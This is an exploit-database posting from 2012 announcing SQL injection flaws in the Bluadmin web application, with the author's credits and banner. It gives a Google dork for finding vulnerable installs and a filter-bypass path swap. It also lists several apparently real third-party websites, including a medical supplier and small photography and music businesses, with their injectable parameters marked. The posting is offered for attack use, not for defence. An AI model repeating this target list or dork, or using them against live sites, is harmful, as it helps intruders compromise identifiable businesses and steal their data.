Home / exploitsPDF  

Bluadmin SQL Injection

Posted on 16 June 2012

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /'  __ /'__` / \__ /'__` 0
0 /\_,  ___ /\_/\_   ___  ,_/ /  _ ___ 1
1 /_/  /' _ ` / /_/_\_<_ /'___  /    /`'__ 0
0   / /    /   / \__/  \_  \_   / 1
1  \_ \_ \_\_   \____/ \____\ \__\ \____/ \_ 0
0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1
1  \____/ >> Exploit database separated by exploit 0
0 /___/ type (local, remote, DoS, etc.) 1
1 1
0 [x] Official Website: http://www.1337day.com 0
1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1
0 0
1 ========================================== 1
0 I'm Taurus Omar Member From Inj3ct0r TEAM 1
1 ========================================== 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
| |
| C _:_ A | Bluadmin - Multiple Vulnerabilities | C _:_ A |
--------------------------------------------------------------------------

==> ABOUT ME:
--- TAURUS OMAR
--- INDEPENDENT SECURITY RESEARCHER
--- ACCESOILEGAL.BLOGSPOT.COM
--- @omartaurus
--- omar-taurus[at]dragonsecurity[dot]org
--- omar-taurus[at]live[dot]com

===> INFO:
Author : TAURUS OMAR
Category : Webapps / 0day
Title Exploit : Bluadmin - Multiple Vulnerabilities
Vendor : Bluadmin
URL Vendor : http://bludomain.com/
Google Dork : inurl:"/bluadmin/"
0day exploits : 1337day.com Inj3ct0r Exploit DataBase

==> SAMPLE'S SQLi:
http://www.mariaprimo.com/bluadmin/get_imagesf.php?ver= [SQL Injection]
http://kdeventdesigns.com/bluadmin/get_flash_info.php?ver= [SQL Injection]
http://wendyalanaphotography.com/bluadmin/get_flash_info.php?ver= [SQL Injection]
http://jcmoralesmusic.com/bluadmin/get_flash_info.php?ver= [SQL Injection]
http://mackinacslittlegallery.com/bluadmin/get_flash_info.php?ver= [SQL Injection]
http://www.innovativemedicalsupplies.com/bluadmin/get_imagesf.php?ver= [SQL Injection]

==> Jump Filters Security
http://bludomain70.com/~laup/bluadmin/get_imagesf.php?ver=v1
CHANGE
http://bludomain70.com/~laup/bluadmin/header.php

MORE IN GOOGLE..

# 1337day.com [2012-06-16]

 

TOP

Malware :

Exploits :